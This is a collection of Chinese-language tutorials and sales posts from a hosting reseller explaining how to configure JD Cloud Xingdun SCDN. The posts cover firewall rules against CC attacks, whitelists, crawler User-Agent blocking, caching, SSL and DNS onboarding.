网站开了防火墙后,想让某个域名请求进来的时候绕过防火墙,不拦截怎么办? 那就只能把域名加入白名单了: 1.进入京东云星盾安全规则-防火墙规则-创建防火墙规则 2.设置规则如下: 防火墙描述:域名白名单 字段:Referer 运算符:等于 值:(填写要加白的域名) 操作:绕过 绕过的功能:浏览器完整检查、安全级别、WAF托管规则 确定添加以上规则即可完成域名白名单功能。 #### 京东云星盾SCDN如何设置指定目录缓存 有客户需要把www.A.com/nba/目录下的网址全部做缓存到CDN节点下,要怎么操作呢? 今天主机吧来教大家如何操作: 1.登陆京东云星盾控制台-页面规则 2.创建页面规则 URL格式:域名/目录/* (比如zhujib.com/nba/* *是通配符,表示这个目录下的所有链接) 规则: 缓存级别(缓存所有内容) 边缘缓存TTL(30分钟,这里是节点的缓存更新时间,可以自己看着设置) 然后保存并部署即可。 创建完成,然后等5分钟再看就可以生效了。 #### 京东云星盾SCDN安全级别开启遭遇攻击防不住CC攻击怎么办? 最近,有位客户网站遭遇大量的CC攻击,使用京东云星盾SCDN开启CF盾都无法拦截,网站访问出现522的情况。 为此,主机吧教大家一个非常有效的方法,可以解决CC攻击问题,进入京东云星盾-数据分析-日志分析功能,往下拉查看请求最多的路径为/ 然后我们进入安全规则-防火墙规则-创建防火墙规则 字段选:URI 运算符:等于 值:写刚才查看的请求最多的路径/ 操作:JS挑战 确认即可,如多个路径被攻击,那么或,填写另一个URI 确认完后,我们进入安全规则-防火墙设置-安全级别-调为高就行 我们再来看效果,攻击都得到了拦截。 #### 京东云星盾SCDN常用自义CC防御规则设置 一些客户在使用京东云星盾的时候,不知道怎么设置CC攻击防御规则,这里主机吧来教大家一些常用的CC攻击防御规则设置。 1.禁海外访问 CC攻击的IP绝大多数是由海外IP组成的,禁掉海外IP访问可以大量减少CC攻击量。 进入安全规则-防火墙规则-创建防火墙规则 规则描述:禁海外访问 字段:地域 运算符:不在以下各项 值:把国内所有省市全选了 操作:阻止 优先级:1 如下图: 2.网站首页开启JS挑战 大多数CC攻击都是通过大量攻击网站首页来达到影响服务器的目的,所以如果我们发现黑客攻击的是首页,我们可以单独设置首页进行JS挑战,开启JS挑战后,首页会对IP首次访问进行一个安全检查,检测通过后会跳转网站首页,检测不过就会拦截请求。 规则描述:首页JS挑战 字段:URI路径 运算符:等于 值:/ 操作:JS挑战 如下图: 3.所有请求开启JS挑战 如果不知道黑客攻击哪个链接,可以对网站所有请求进行安全检测,全面拦截黑客攻击。 规则描述:所有请求开启JS挑战 字段:请求方法 运算符:以下各项之一 值:所以请求方式都选 操作:JS挑战 如下图: 以上就是三种常用的拦截CC攻击的规则设置,大家可以根据自己网站的实际情况进行操作,如有需要京东云星盾优惠的也可以找我们。 #### 京东云星盾SCDN故障了 今天晚上,一位客户联系上主机帮,反馈网站打不开了,不知道是不是CDN的问题。 主机帮特地ping了下域名,显示未解析状态。 一开始主机帮以为是客户的域名未解析的问题,后来ping了下京东云SCDN的cname记录,发现也未解析状态,基本可以确定是京东云的问题了。 赶紧提交工单联系京东云,说实话京东云的售后特别慢,也不知道这半夜的官方能不能处理,主机帮也第一次遇到京东云星盾这种故障,京东云星盾给主机帮的感觉是一直都很稳定,此次故障确实很少见。 #### 京东云星盾SCDN站点部分正常请求被误拦截如何处理 使用高防CDN可能有一些正常的请求会被防火墙误拦截,比如京东云星盾SCDN站点部分正常请求被误拦截如何处理? 您可以通过防火墙配置,降低敏感度设置以及安全规则等级,或者将“挑战”设置为日志记录模式,进行流量观察,如果还未生效请及时与京东云客户服务团队取得联系反馈。 #### 京东云星盾SCDN防火墙规则功能升级通知 京东云安全SCDN产品计划于2024年4月22日进行防火墙规则功能升级,产品升级内容和影响如下: 防火墙规则功能升级,新增若干特性,比如,在阻止操作时,允许自定义响应码和响应正文。 托管规则集功能升级。 OWASP核心规则集功能升级,由于新的规则集基于OWASP核心规则集(v3.x),无法与旧版2.x版本对应,因此升级后,会将用户的OWASP核心规则集重置为最高防护等级,如果产生误拦截,请用户自行调整防护等级,或调整具体规则。 升级影响:为尽量减少升级带来的误拦截影响,建议用户在业务闲时自行将OWASP核心规则集的防护等级修改为高,并观察对业务的影响,如存在误拦截情况,请联系京东云安全团队协助进行规则调整。如用户对计划的升级时间存在疑虑,请联系京东云安全团队协商合适的升级时间。 #### 京东云星盾SSL/TLS加密功能介绍 SSL/TLS概述 标准HTTP协议通过互联网发送未加密的数据,其易于遭到拦截。相比之下,HTTPS安全超文本传输​​协议加密可防止窃听,防止敏感数据泄露以及其他行为。通过使用HTTPS协议可以加密保护站点流量。 加密模式 我们建议您对域名访问者与京东云安全加速网络之间以及安全加速网络与源服务器之间的流量进行端到端加密。 提供的几种加密模式说明如下: 关闭,该模式下未对站点进行加密,该种模存在安全隐患。灵活,该模式下,对客户端与安全加速之间的流量进行加密。安全,该模式下端到端加密,也就是客户端与安全加速网络以及到后端源站,都需要进行加密。严格,该模式下端到端加密,也就是客户端与安全加速网络以及到后端源站,都需要进行加密,并且源服务器需要具有受信任的CA证书,最为严格。 SSL证书 通用SSL证书安全加速提供免费的通用SSL证书,可以通过SSL证书-订购SSL证书获取免费证书。通用SSL证书与专用证书相比有以下限制:浏览器和操作系统支持相比较少在多个安全加速客户之间共享仅涵盖一级子域(例如::example.com,但不包括“dev.example.com”)专用SSL证书 与通用证书相比,购买专用证书有以下几点优势:浏览器和操作系统支持更好证书单独使用不与其他客户共享可涵盖其他级别的子域(例如:“test.dev.example.com”,而不仅仅是“example.com”)自定义证书 自定义证书,允许客户将自己的有效证书上传到安全加速。自定义证书不适用于未经有效证书颁发机构签名的自签名证书。证书设置始终使用HTTPS开启功能会将所有使用“HTTP”的请求,重定向到"HTTPS",并且会应用到所有HTTP请求。最低TLS版本允许客户设置最低TLS版本,设置后仅仅允许来自支持所选TLS协议版本或更高版本的访问者的HTTPS链接。自动HTTPS重写开启自动 HTTPS 重写,会将提供服务的网站上所有资源或链接的 “HTTP” 更改为 “HTTPS”。该功能需要源站配合支持HTTPS。禁用通用SSL禁用通用 SSL,将从边缘节点删除您所在区域当前处于活动状态的所有通用 SSL 证书,并阻止订购将来的任何通用 SSL 证书。如果没有为域上传专用证书或自定义证书,访问者将无法通过 HTTPS 访问该域。 #### 京东云星盾入门操作指南 入门指南 为便于您快速开通、配置、启用京东云安全加速服务,现对服务开通及配置说明如下,您可以结合控制台前端进入接入操作: 第一步:购买安全加速实例 1、 通过京东云官网登录控制台,在云安全类别下选择星盾安全加速,进入产品控制台,购买产品实例。 第二步: 添加域名 1、 进入安全加速客户控制台【域名管理】页面。点击“添加域名”。 2、 填写域名,选择【全接入】或者【半接入】方式,然后点击“确定”按钮。 【全接入】方式即NS接入,可针对根域名进行安全防护。且DNS解析过程相对较少,无需CNAME二次跳转; 全接入需支持NS权威解析记录修改; 全接入支持解析记录类型如下: A 将域名指向一个IPV4地址 AAAA 将域名指向一个IPV6地址 CNAME 将域名指向另外一个域名 NS 将子域名指定其他DNS服务器解析 MX 将域名指向邮件服务器地址 SRV 记录提供特定服务的服务器 TXT 文本长度限制255,通常做SPF记录(反垃圾邮件) CAA CA证书颁发机构授权校验 【半接入】即CNAME接入,接入方式简单,适用于大多数接入场景,灵活性强。但不能对根域名进行安全防护。无法防护NS权威解析服务器; 半接入支持解析记录类型: A 将域名指向一个IPV4地址 AAAA 将域名指向一个IPV6地址 CNAME 将域名指向另外一个域名 4、 访问安全加速【域名管理】可看到添加的域名成功。 第三步:接入DNS配置 1、全接入 NS 配置 域名管理中点击添加域名,选择全接入。系统将会生成两个NS记录。 根域名接入情况,如example.com: 去往域名的注册商,更改原有example.com的原始NS记录为系统生成的两个NS记录,系统自动校验完成标记为有效即接入完成。 子域名接入情况,如test.example.com 请前往根域名如example.com的DNS解析管理面板,添加两条test的NS记录,内容为系统生成的如上两条NS记录,系统自动校验完成标记为有效即接入完成。 2、半接入 CNAME 配置 域名管理中点击添加域名,选择半接入。系统生成CNAME记录与TXT校验记录。 进行TXT验证: 前往根域名的解析管理面板,如前往example.com的DNS解析管理面板,使用verify.test.example.com作为主机记录,添加TXT校验记录,系统校验完成后接入生效。 若超出1小时仍未生效,请点击: “TXT验证”。 添加CNAME记录 去往根域名的解析管理面板,如前往example.com的DNS解析管理面板,添加CNAME记录将test.example.com指向CNAME:test.example.com.lk-d49fa0.cdn.jdcloud-scdndns.com 第四步:添加源站解析记录 两种接入方式均需进行域名审核,域名审核通过后,服务配置会在30分钟生效,请您耐心等待。 在安全加速域名管理,点击域名进入域名解析配置页面,添加域名的源站记录。 注:在进行切换操作时,建议先切换较小业务流量域名,再切换较大业务流量域名,谨慎操作,避免人为的操作失误。 修改DNS服务器需要0-72小时的生效时间,如果发现某些地方记录没有生效,并且修改DNS的时间不到72小时,还请耐心等待。 #### 京东云星盾后台上传文件图片被拦截怎么办? 最近,有小伙伴在使用京东云星盾的时候,出现了误拦截的情况,原因是在后台上传图片提示:您的请求被阻断。 针对这个问题,解决方法有两个: 1.把本地网络IP加入京东云星盾IP白名单。 这种方法可以有效解决上传拦截误杀问题,同时还保证网站安全,缺点是如果你的本地IP变更了就需要重新变更过,这个方法不适合前端客户拦截的情况。 操作方法:https://www.zhujib.com/jingdongyunxingdunruhetianjiaipduan.html 2.把被拦截的地址绕过WAF规则 这个方法是把容易误杀的地址加入WAF绕过白名单,使其不在安全检查,缺点是可能不大安全,但这个方法适合前端上传被拦截的情况,而且不会因为变更IP而影响。 操作方法如下: 首先联系被拦截的用户,提供本地电脑的IP(你自己被拦截的也可以用本地IP)登陆日志分析-安全事件-搜索IP记录。 找到采取的措施为block的记录,并复制保存这些链接,等下要加白这些链接 复制保存好这些链接后,我们再进入安全规则-防火墙规则-创建防火墙规则,如下: 规则名称上传加白 字段:完整URI 运算:等于 值:填写之前复制的链接(注意一定要加完整地址) 操作:绕过 绕过的功能:WAF托管规则 确定。 这样我们就可以把这些拦截的地址绕过WAF规则了,再测试就不会拦截了。 以上两种方法都可以有效解决WAF拦截问题,自己根据自己的需求来操作,如果误拦截的是前端用户上传功能,那么用第二个方法,如果误拦截的是你自己操作后台,那么用第一个方法比较安全。 #### 京东云星盾域名半接入指导教程 京东云星盾流量版只支持半接入接入方式,所以我们今天来教大家如何接入。 首先,我们先添加主域名,然后我们会得到如下图: 然后我们点击上图中的待激活问号,会出现一个要求解析TXT的记录值: 我们进入域名DNS解析对应的TXT记录值,如下图: 记录类型 TXT 主机记录verify 记录值:132288325-1104523937(添加域名的时候会随机显示对应值) 添加完解析后,我们等几分钟就可以自动激活了。 激活后,这里会显示已激活 然后,我们进入DNS配置,添加子域名 记录类型:A 主机名:www(这里填域名的子域名,比如WWW,比如H5) IPv4地址:填写你服务器的IP 确认。 然后,我们再返回之前激活界面那里 复制cname记录 再到域名DNS那里解析对应的cname记录。 记录类型cname 主机记录www 记录值为之前在京东复制的cname记录,前缀添加上子域名,比如京东的cname记录为zhujib.com.lk-f26a28.cloud-scdn.com,那么解析www子域名时,就填写www.zhujib.com.lk-f26a28.cloud-scdn.com,如下图: 解析后完后,一般半小时左右生效,这样就表示我们已经成功接入京东云星盾SCDN了。 #### 京东云星盾如何开启全站JS挑战防御CC攻击 最近,主机吧发现京东云星盾开启遭遇攻击模式后,会出现真人验证模式,需要手动点击确认才会跳转网站,非常不友好,而且有时候还不跳转,误杀率极高。 在通过反馈京东云官方后得知: 开启遭受攻击模式 现在默认是 Managed challenges。 Managed challenges 会根据请求特征,判断采取的质询类型 1、出现非交互式挑战页面(类似于当前的 JS 挑战)。 2、出现交互式挑战(例如单击按钮) 目前遇见的真人验证属于第二种情况 而且真人验证还无法关闭,这挺麻烦的。 所以,在被CC攻击的时候我们可以另寻方法,利用防火墙规则单独对域名进行JS挑战即可,操作方法如下: 1.进入星盾安全规则-防火墙规则 2.创建防火墙规则 3.填写规则,如下: 规则描述:全站JS挑战 字段:主机名 运算符:等于 值:你的域名(比如zhujib.com) 然后确认后即可生效,效果类似于CloudFlare的我遭遇攻击模式,每隔一段时间访问网站会有一个安全检查,通过后会自动跳转至网页,如不通过会拦截,这个功能对CC攻击效果非常好。 需要注意的是如果你的网页有支付功能,记得要先把第三方支付平台的回调IP加白,否则会支付失败。 好了,以上就是使用京东云星盾如何开启全站JS挑战防御CC攻击教程了,如有不懂的可以咨询主机吧,有需要京东云星盾的也可以联系,价格优惠。 #### 京东云星盾如何添加IP段白名单 最近,有客户在使用京东云星盾安全加速SCDN的时候,遇到一个问题,想给CDN防火墙添加白名单IP段不知道怎么操作。 这里主机吧教大家如何使用: 1.进入京东云星盾控制台-安全规则-防火墙规则 2.创建防火墙规则 3.规则描述:白名单 表达式: 字段 :IP地址 运算符:包含以下各项 值:填写IP段 操作:绕过 绕过的功能:浏览器完整性检查、安全级别、WAF托管规则 如下图: 确认后即可,如有多个IP段添加,请选择或 #### 京东云星盾如何给各大搜索引擎UA加白名单 京东云星盾在开启遭遇攻击模式或者JS挑战的时候,是会把搜索引擎的蜘蛛拦截的,因为遭遇攻击模式或者JS挑战的时候,是需要人机验证的,而搜索引擎蜘蛛并不具有人机识别的能力。 解决办法是把各大搜索引擎的蜘蛛访问UA加入白名单,这样通过些UA访问过来的,就不会有拦截,缺点,如果有人假冒这些UA对网站进行访问,那么也是不会有任何拦截,所以各类同学根据自己的需求看着来弄。 操作方法: 1.进入点击进入安全规则-防火墙规则 2.创建防火墙规则 3.填写规则 规则名称:UA白名单 字段:User-Agent 运算符:等于 值:Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) 或Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B 操作:绕过 绕过的功能:全部 确认即可。 如下图: 其中的值自己根据想要加白的搜索引擎UA多少来填,如需要把360、谷歌等搜索引擎UA一起加白的,选或,再输入对应的UA,千万别选且。 以下是一些主要搜索引擎的抓取蜘蛛User-Agent的示例: 百度 百度PC蜘蛛:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) 百度移动蜘蛛:Mozilla/5.0 (Linux; u; Android 4.2.2; zh-cn;) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) 百度小程序蜘蛛:Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; Smartapp; +http://www.baidu.com/search/spider.html) 谷歌 Google PC蜘蛛:Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/W.X.Y.Z Safari/537.36,其中W.X.Y.Z是Chrome浏览器版本号,会随Googlebot的更新而变化。 Google移动蜘蛛:Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/W.X.Y.Z Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 必应 Bing PC蜘蛛:Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/ 或 Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) W.X.Y.Z Safari/537.36 Bing移动蜘蛛:Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/W.X.Y.Z Mobile Safari/537.36 Edg/W.X.Y.Z (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) 搜狗 搜狗PC蜘蛛:Sogou web spider/4.0 (+http://www.sogou.com/docs/help/webmasters.htm#07) 搜狗移动蜘蛛:Sogou wap spider/4.0 (+http://www.sogou.com/docs/help/webmasters.htm#07) 360搜索 360搜索蜘蛛:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider 神马搜索 神马PC蜘蛛:Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36 神马移动蜘蛛:Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e YisouSpider/5.0 Safari/602.1 Yandex Yandex蜘蛛:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 #### 京东云星盾安全加速 SCDN如何屏蔽海外访问? 一般的CC攻击,都是海外IP居多,这是由于海外不需要实名,而且攻击国内很查到来源。因此,屏蔽掉海外访问是一个不错的CC攻击防御策略。 下面我们来教大家利用京东云星盾安全加速 SCDN屏蔽掉海外的请求。 进入安全规则-防火墙规则 创建防火墙规则: 规则描述:海外屏蔽 字段:地域 运算符:不包含以下各项 值:选择全部省份市 操作:阻止 确认如下图: 完成后,我们测试海外访问,海外访问状态会显示403 #### 京东云星盾安全加速产品概述与功能概览 产品概述 京东云星盾安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 功能概览 攻击防御威胁 安全防火墙京东云安全加速提供防火墙功能,可对请求流量进行精细控制,用于监控、挑战、阻止可疑流量与恶意流量。应用防火墙(WAF):WAF功能可识别恶意内容如垃圾评论中的关键字、跨站脚本攻击(XSS)以及SQL注入(SQLi)。它可提供托管规则集、OWASP核心规则集以及客户自定义规则,以应对不同应用场景。IP访问规则:可用于阻止挑战可疑的恶意流量,并可允许定期访问的网站服务(API、爬虫等),它可以根据访问者提供的IP、地区、ASN对流量进行允许、阻止和挑战操作。UA阻断与区域锁定:区域锁定允许在单个规则中同时允许多个目标以及IPv4和IPv6地址。在区域锁定规则中未指定的IP地址被拒绝访问指定的资源。UA规则阻止特定的浏览器或Web应用程序用户代理请求标头。UA规则在区域锁定规则之后应用,因此通过区域锁定允许IP地址将跳过UA规则。 DDoS攻击防御提供超大的带宽容量,可以对大规模DDoS攻击行为进行防御,它支持HTTP Flood、UDP Flood、TCP Flood等攻击,可对攻击进行自动监控和防御。 增强应用性能 内容加速:提供完整的静态网页、文件等互联网内容分发管理和网络加速解决方案,确定每个请求最有效率的到达目的地。 灵活配置缓存加速:能够对内容在其网络上进行高级控制,通过页面规则,可以为URL指定特定行为,包括缓存的内容和持续时间,。并且通过Cache API可以让客户更好的控制内容缓存方式。 优化加速:通过对图像大小调整、图像优化加速、代码优化、HTTP/2优化,URL预取等功能,对移动端优化加速。 节省带宽:通过将静态内容缓存在星盾安全加速网络上,可以从京东云安全加速 数据中心提供静态内容,从而减少原始服务器的请求数量,降低带宽消耗。 提升业务可靠性 DNS安全性:安全加速具备DNS攻击的防御功能,可阻止针对DNS系统的网络攻击。 DNS解析性能:遍布全国的三大运营商节点网络,低延迟的DNS查询以及传播速度。 提供数据可视化与监控 缓存分析,缓存分析可帮助确定缓存中的资源是否丢失,已过期或不适合缓存。缓存分析包括按主机名过滤,从而协助提高站点性能或减少原始Web服务器流量。您的访客来自哪里,您的访问者可以到达哪个安全加速数据中心,以及访问者在特定数据中心请求资源的频率。 安全分析,安全分析对于过去的威胁、排名靠前的地区以及威胁类型,并且可以查看最受威胁的地区等。 性能分析,使用客户端的HTTP版本、节省的带宽占比以及缓存内容类型明细,充分了解性能优化情况。 #### 京东云星盾对比百度云加速优劣势 主机吧代理百度云加速有5 6年了,而代理京东云星盾也有几个月了,对于两家产品,各有优劣势,今天主机吧就根据自己的经验,给大家对比下。 百度云加速优势 1.价格便宜 相比京东云星盾,百度云加速价格要便宜些,以专业版为例,每天100G流量,一年就30多T流量,代理价才795元一年,而京东云星盾3T的流量套餐720元一年,所以百度云加速的流量是非常便宜的。 2.CC防御效果好 目前来说,百度云加速的CC防御效果是主机吧所以产品里最好的,而且不需要什么操作,只需直接开启强力防护模式即可。只要攻击量不超过套餐防御,可以拦截99.99%的CC攻击。 3.SEO效果 百度云加速自带SEO功能,虽然效果不是很明显,不过起码还是有些作用的,这也是用百度自家产品的好处。 4.拥有高防版本 百度云加速如果攻击量超过套餐的防御量了,可以购买高防包,高防包有100G、300G的,可以拦截超强CC攻击,当然价格会贵很多。 京东云星盾优势 1.节点多 百度云加速套餐一般分配十来个节点,而京东云星盾即使是最基础的版本也分配了30多个节点。 2.节点速度快 由于节点多,所以部分地区京东云星盾速度要比百度云加速快一些。 3.功能多 百度云加速的功能对比京东云星盾比较少,京东云星盾支持自义WAF防火墙,支持图片优化、代码优化、免费通用证书、BOT管理、转发配置、Brotli压缩算法、HTTP/2优化、WebSocket、自义页面等功能,当然很多功能都是需要高级版本才支持的。 4.报表详细 百度云加速的报表相对简单,而京东云星盾的报表非常的详细,可以看到缓存命中率,访问设备、请求路径、访问内容类型等,对于喜欢观察网站运营的站长是非常有帮助的。 5.防御能力强 如果说百度云加速的CC防御效果好的话,那么京东云星盾的防御效果是强,百度云加速普通版本可以防御中大型CC攻击,如果攻击量超了套餐的防护量需要购买高防IP进行防御,而京东云星盾是没有CC防护限制,但根据官方的介绍,CC防护上限是百度云加速的3倍以上,对于遇到超大型CC攻击的朋友是一个不错的选择,比如遇到七色光联盟的攻击。而且京东云星盾有自义WAF功能,可以根据CC攻击的特征进行拦截,防御更为灵活。 6.套餐上限高 京东云星盾拥有包年包月的套餐,可以支持绑定10到40个域名,而百度云加速一个套餐只能绑定一个域名。同时京东云星盾支持最大上传文件500M,最大缓存文件5G,这比百度强太多了,百度云加速最大上传100M而以。 好了,以上就是百度云加速与京东云星盾的优劣势对比。总得来说,各有优势,当然京东云星盾的优势更大些,只是价格要贵些。如果你也有需要高防CDN的,可以联系主机吧购买,价格优惠! #### 京东云星盾常见问题解答 Q:如何快速接入京东云星盾安全加速?A:推荐使用Cname方式进行快速接入,按需购买版本套餐,添加域名,选择半接入方式。经过京东云审核后,进入京东云安全加速域名列表页,获取域名对应CNAME以及TXT记录; 访问域名解析服务供应商,进行加速域名和域名CNAME的解析记录绑定。并进行TXT验证域名所属权验证。完成以上步骤,即可接入京东云安全加速服务。Q:站点部分正常请求被误拦截如何处理?A:您可以通过防火墙配置,降低敏感度设置以及安全规则等级,或者将“挑战”设置为日志记录模式,进行流量观察,如果还未生效请及时与京东云客户服务团队取得联系反馈。Q:BOT机器人管理出现误拦截如何处理?A:目前BOT机器人管理处于Beta阶段,会存在误报的情况,可通过以下几种方式降低误报率。1)针对验证过的BOT设置为开启 2)BOT阻断策略,降低BOT分数,或者关闭通过BOT打分阻断功能 3)开启BOT允许访问静态资源,该功能对您的源站无性能压力影响。Q:星盾支持哪些端口?A:默认情况下,星盾代理发往下列HTTP/HTTPS端口的流量。 1)星盾支持的HTTP端口:80、8080、8880、2052、2082、2086、2095 2)星盾支持的HTTPS端口:443、2053、2083、2087、2096、8443 3)以下端口已禁用缓存:2052、2053、2082、2083、2086、2087、2095、2096、8880、8443 #### 京东云星盾拦截常见恶意爬虫方法 现在网上针对网站的恶意爬虫相当多,对网站造成影响非常大,轻则使网站访问卡慢,重则使服务器停止运行,而如果网站使用了CDN,还会对非常消耗CDN流量,造成财产损失,因此拦截恶意爬虫是非常重要的,使用京东云星盾可以有效拦截特定恶意爬虫抓取网站,以下是常见爬虫的拦截方法。 1.进入京东云星盾后台-安全规则 2.创建防火墙规则 规则名称:拦截恶意爬虫 字段:选User-Agent 运算符:等于 值:填写恶意爬虫的User-Agent,如chatgpt的User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) 操作:阻止 响应类型:默认 如下图: 3.添加多个恶意爬虫拦截 点或按钮 再输入另一个恶意爬虫的User-Agent,比如DataForSeoBot的 如下图: 以此类推,把需要拦截的恶意爬虫全部加上,再点确定即可拦截。 想知道是否正常拦截,可进入数据分析-事件日志查看。 下面主机邦根据客户反馈的恶意爬虫User-Agent分享给大家,需要拦截的直接把User-Agent加上就可以了。 1.GPTBot GPTBot是OpenAI推出的一款网络爬虫机器人,抓取非常频繁,建议屏蔽。 User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) 2.AmazonBot AmazonBot是亚马逊不同广告服务部门使用的爬虫,包括Amazon AdBot等,抓取频繁,对网站毫无用处,建议屏蔽。 User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 3.PanguBot PanguBot 是由华为公司开发的一个爬虫,主要用于下载训练数据,以支持其多模态大型语言模型(LLM)PanGu 的训练。抓取非常疯狂,建议屏蔽。 User-Agent:Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PanguBot;pangubot@huawei.com) 4.SemrushBot SemrushBot是Semrush发送的用于发现和收集新的和更新的Web数据的搜索机器人软件。抓取非常频繁,建议屏蔽。 User-Agent: Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html) 5.DataForSeoBot DataForSeoBot是DataForSEO网站的蜘蛛,旨在向世界各地的SEO爱好者和专业人士提供高质量的数据。抓取非常频繁,建议屏蔽。 User-Agent: Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot) 6.BLEXBot BLEXBot是WebMeUp的蜘蛛爬虫,每天可以抓取上百亿个页面来收集反向链接数据,并将该数据提供给其链接索引(在SEO SpyGlass中使用的链接索引)。它是美国的一家外链反向链接查询工具网站所使用的爬虫。 抓取非常频繁,建议屏蔽。 User-Agent: Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/) #### 京东云星盾最新IP白名单(2025/9/5) 如果你的网站访问时不时出现522超时的情况,那么可能是你的服务器状态满了,或者服务器防火墙拦截了京东的IP。 今天我们来更新下最新的京东云星盾回源IP: 14.204.96.224/2727.36.126.224/2727.128.218.224/2736.136.95.32/2736.147.52.160/2736.154.11.224/2742.236.121.160/2760.13.99.64/26101.69.205.224/27103.44.252.32/27110.40.28.96/27111.48.87.160/27111.170.27.96/27112.49.47.96/27113.56.217.96/27114.67.161.32/27114.67.192.208/28116.163.41.64/26116.177.225.128/27116.198.49.144/28116.198.165.16/28117.187.185.32/27119.0.67.32/27119.188.204.32/27120.206.188.224/27120.220.55.96/27120.226.37.160/27120.241.124.96/27121.17.125.32/27122.226.163.224/27123.138.203.160/27124.166.232.32/27124.225.84.32/27124.236.72.32/27125.77.31.224/27150.138.153.192/26182.201.240.224/27183.131.87.224/27198.41.130.16/28218.207.1.32/27220.185.189.128/25222.216.121.160/272400:cb00:164:0:1000::/682403:1ec0:1200:ff98::/642403:1ec0:1400:ff01::/642403:1ec0:1400:ff05::/642403:1ec0:1610:ff05::/642407:3740:0:6:1000::/682408:8719:64:50:1000::/682408:871a:8810:205:1000::/682408:8720:806:102:1000::/682408:8726:3000:fff4:1000::/682408:8740:71fc:406:1000::/682408:874f:b000:4:1000::/682408:8752:600:6:1000::/682408:8756:4cff:d002:1000::/682408:8760:107:2:1000::/682408:876c:2c0:112:1000::/682408:8773:fff:ffe1:1000::/682408:8776:1:72:1000::/682409:8720:4001:2:1000::/682409:8760:1e81:52:1000::/682409:8c34:d00:6:1000::/682409:8c38:c50:604:1000::/682409:8c3c:1400:5:1000::/682409:8c4d:5200:c05:1000::/682409:8c50:a00:2213:1000::/682409:8c54:4010:27:1000::/682409:8c5c:b00:206:1000::/682409:8c6a:3a11:2:1000::/682409:8c6c:561:8124:1000::/68240e:b1:9801:20d:1000::/68240e:f7:4d0f:601:1000::/68240e:f7:7c00:821:1000::/68240e:90d:1101:203:1000::/68240e:914:4005:1:1000::/68240e:938:a05:22:1000::/68240e:940:e009:14e:1000::/68240e:944:8:5:1000::/68240e:950:1:2011:1000::/68240e:95d:c02:7:1000::/68240e:965:820:105:1000::/68240e:97c:4014:102:1000::/68 #### 京东云星盾缓存规则介绍 京东云安全加速支持缓存功能,该功能可以在距离访问者更近的地方提供资源,节省源站不必要的访问流量。 缓存概述 安全加速根据以下内容缓存静态内容: 域名访问者的来源访问者可以到达哪个安全加速数据中心访问者在特定数据中心请求资源频率 安全加速在以下情况下不缓存内容: DNS配置为(灰色)未代理状态 安全加速提供几种缓存自定义选项: 通过“缓存”页面调整缓存级别、TTL等通过“页面规则”为各个URL指定缓存配置通过“Workers”自定义缓存(Workers边缘计算功能即将上线,敬请期待) 针对不同套餐级别,缓存文件大小上限限制不同,具体可参考套餐规格。 缓存文件类型 安全加速通过文件扩展名缓存,将会自动缓存包含某些文件扩展名的文件,默认不缓存HTML。 如需缓存HTML内容,需要通过页面规则来缓存静态HTML内容。 bmp、ejs、jpeg、pdf、ps、ttf class、eot、jpg、pict、svg、webp css、eps、js、pls、svgz、woff csv、gif、mid、png、swf、woff2 doc、ico、midi、ppt、tif、xls docx、jar、otf、pptx、tiff、xlsx 安全加速高速响应缓存 Cache-Status标头输出显示资源是否缓存。 缺少标头的情况标明资源未缓存。 HIT 在安全加速的缓存中找到资源MISS 未在安全加速缓存中找到资源,从源Web服务器获取EXPIRED 在安全加速缓存中找到资源但已过期,从源Web服务器获取STALE 